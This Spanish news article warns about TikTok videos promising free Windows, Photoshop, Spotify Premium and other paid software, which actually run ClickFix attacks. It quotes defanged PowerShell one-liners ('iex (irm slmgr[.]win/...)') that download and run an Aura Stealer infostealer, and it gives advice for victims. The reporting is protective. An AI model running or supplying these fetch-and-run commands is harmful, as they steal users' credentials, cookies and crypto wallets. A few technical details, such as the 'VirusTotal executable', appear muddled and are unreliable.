TikTok está lleno de vídeos que enseñan cómo instalar Netflix, Spotify Premium o Windows gratis. Estos servicios digitales son de pago, pero millones de usuarios buscan disfrutar de sus ventajas gratis. Sin embargo, hay que tener cuidado porque se han detectado estafas.
Cuando la empresa sueca Spotify empezó a eliminar las APK de la versión premium de su app, muchos internautas comenzaron a buscar alguna alternativa que todavía siguiese funcionando. No obstante, los ciberdelincuentes aprovecharon y hubo personas que terminaron descargando malware.
Varios meses después, hay usuarios que se niegan a prescindir de las ventajas de Spotify Premium gratis. Estos todavía buscan un programa que ofrezca los beneficios de la versión de pago sin pagar. Cuando en Google no encuentran la solución, van a TikTok, donde los usuarios explican como supuestamente tener una APK. Si sigues los pasos, en realidad estarás instalando un virus informático en tu dispositivo.
Como con la suscripción a Spotify Premium, ocurre con otros servicios digitales que suponen una membresía mensual o anual. Algunos ejemplos de falsas guías de activación gratuita que podemos encontrar en TikTok son:
- Windows
- Microsoft 365
- Adobe Premiere
- Photoshop
- CapCut Pro
- Discord Nitro
- Netflix
- Spotify Premium
¿Qué hay detrás de las falsas suscripciones gratuitas?
Xavier Mertens, responsable de ISC, ha alertado al medio de comunicación BleepingComputer de una campaña masiva en TikTok de ataques ClickFix. Se trata de una técnica de ingeniería social que utilizan los ciberdelincuentes para que las víctimas ejecuten scripts maliciosos. Con estas estafas, los piratas informáticos obtienen permisos de administrador de los sitios web para instalar plug-ins falsos y, posteriormente, instalen troyanos en sus equipos.
A continuación, desglosamos cómo funcionan los vídeos de activación fraudulentos de TikTok.
El modus operandi de las estafas de TikTok
Aunque haya diferentes «ganchos» para llevar a cabo la estafa, la técnica ClickFix que usan es casi siempre parecida. En los vídeos, los ciberestafadores enseñan un comando corto de una línea y explican a los usuarios que deben ejecutarlo como administrador en PowerShell.
La URL del programa varía según el programa que dicen que se conseguirá. Por ejemplo, una falsa guía de activación de Photoshop, indicará que el comando que se debe usar es iex (irm slmgr[.]win/photoshop); uno de Windows, lo cambiará por iex (irm slmgr[.]win/windows).
Cuando el script se ejecuta, PowerShell se conectará al sitio remoto slmgr[.]win para ejecutar otro comando. Eso da lugar a la descarga de dos ejecutables de las páginas de Cloudflare. Uno de ellos es una variante del malware Aura Stealer. Este virus informático es capaz de acceder a las credenciales guardadas de navegadores, cookies de autenticación, billeteras de criptomonedas y credenciales de otras aplicaciones.
Otro archivo que se descarga es un ejecutable de VirusTotal que se utiliza para autocompilar código. No obstante, el experto de ciberseguridad Mertens señala que todavía no está claro el propósito de esta descarga adicional.
¿Qué hacer si he sido víctima?
Los expertos en ciberseguridad recomiendan que nunca descarguemos un programa desde fuentes no oficiales ni fiables. Por lo tanto, no deberías seguir ninguna supuesta guía de activación para obtener servicios de pago gratis. Las empresas cada vez se esfuerzan más en perseguir las APK que ofrecen su contenido premium de manera ilegal. Por lo general, no te encontrarás con Spotify Premium, Netflix, Windows u otra plataforma gratuita, sino con un malware, y no merece la pena arriesgarse.
Pero, si ya es tarde y has sido víctima de alguna estafa de este tipo de las que abundan por TikTok, desinstala todos los programas que se hayan instalado cuanto antes. Además, tendrás que cambiar las contraseñas de todas tus cuentas y aplicar la autenticación en dos pasos si es posible. Para evitar que quede cualquier rastro del troyano, resetea de fábrica el dispositivo que hayas utilizado.
